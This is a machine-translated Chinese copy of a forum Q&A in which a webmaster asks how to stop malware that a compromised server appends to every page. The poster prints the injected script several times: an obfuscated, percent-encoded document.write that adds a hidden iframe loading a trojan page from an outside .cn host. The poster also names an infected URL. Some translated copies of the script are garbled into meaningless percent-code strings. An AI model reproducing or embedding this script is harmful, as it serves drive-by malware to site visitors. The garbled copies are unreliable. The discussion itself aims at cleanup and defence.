以编程方式停止html/javascript/css中的特定代码块_Javascript_Html_Css_Antivirus

以编程方式停止html/javascript/css中的特定代码块

javascript html css

以编程方式停止html/javascript/css中的特定代码块,javascript,html,css,antivirus,Javascript,Html,Css,Antivirus,有我的网站的服务器上也有病毒病毒注入恶意代码 <b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%

有我的网站的服务器上也有病毒

病毒注入恶意代码

<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>

/*警告：仅限Opera*/var hKo=document.createElement（“脚本”）；（6%6%6%6%69%6%6%6%6%6%6%6%6%6%6%6%6%6%6%6%7%72%72%72%72%72%72%72%72%72%72%72%72%72%72%7%72%7%72%7%7%7%7%7%7%7%73%72%72%72%72%72%72%72%72%72%72%72%72%72%63%72%63%72%63%72%63%63%63%63%63%63%72%63%72%63%72%63%72%72%63%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%“；”；文件.getElementById（“BAs”）.appendChild（hKo）

它被Apache或类似的东西预处理，并将其添加到文件的末尾

我创建了一个测试文件，代码如下：

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>


测试HTML文件
测试HTML文件

它并不漂亮，但它达到了它的目的

在浏览器中查看页面时，我会

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>


测试HTML文件
测试HTML文件
/*警告：仅限Opera*/var hKo=document.createElement（“脚本”）；（6%6%6%6%69%6%6%6%6%6%6%6%6%6%6%6%6%6%6%6%7%72%72%72%72%72%72%72%72%72%72%72%72%72%72%7%72%7%72%7%7%7%7%7%7%7%73%72%72%72%72%72%72%72%72%72%72%72%72%72%63%72%63%72%63%72%63%63%63%63%63%63%72%63%72%63%72%63%72%72%63%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%72%“；”；文件.getElementById（“BAs”）.appendChild（hKo）

可从www.sagamountain.com/testfile.html查看（警告，此页面已感染）

我需要以编程方式停止该div和该脚本的执行，因为它是一个指向带有特洛伊木马的站点的iframe。HTML、CSS或JS，我只需要一些方法来阻止JS执行

它已经显示：无，因此您无法看到它，但如何防止iframe加载

谢谢你的帮助！unescape的东西会分解成一个iframe，这显然是我麻烦的根源。不要去那个网站

编辑：这是

的后续内容。很抱歉，我无法回答您的具体问题，但我认为您的看法是错误的。你需要做的不是去除病毒插入的html，你需要做的是与你的web主机/系统管理员交谈并去除病毒

治疗这些症状并不能治愈感染。然而，治疗这种疾病也可以治疗症状和清除病毒。

您服务器中的文件是一个php文件，请查看注释。

赛博，如果您必须等待服务器上的其他人修复，我建议您应该尝试使用open

标记或open HTML注释标记来结束您的文档

除非使用

document.write

和上述标记之一（noscript/comment），否则不能使用Javascript停止未呈现的内容。此外，您也不能通过在后面放置脚本来做任何事情，因为已经太晚了（内容已经存在）

这是一个丑陋的解决方案，但应该防止您的网站访问者体验病毒。它也会使标记无效，但任何浏览器都应该能够解析它并按预期呈现它

祝服务器好运

等等，你的服务器被感染了？清理一下怎么样？它会有一个很好的副作用，从你的页面中删除IFRAME…而且你的服务器显然仍然可以在网上访问…我无法访问任何服务器文件。我应该告诉他们怎么做？告诉他们a。使服务器脱机，然后b。查看Google发送给你的材料，并执行必要的步骤来消除感染。Google没有向我发送任何材料，而网站管理员工具的恶意软件信息在这个时候没有显示任何内容。我已经告诉他们让服务器离线，但他们不想关闭它。这个问题最好在ServerFault上回答。在最初的问题中，您（在对其中一个答案的评论中）说您的服务器仍然受到感染。你怎么知道的？请与您的提供商联系并提供此信息。我知道它仍然受到感染，因为所有页面底部都有JS。当自己编辑文件时，JS不存在，这让我相信服务器仍然被感染。这真是天才，我刚刚补充道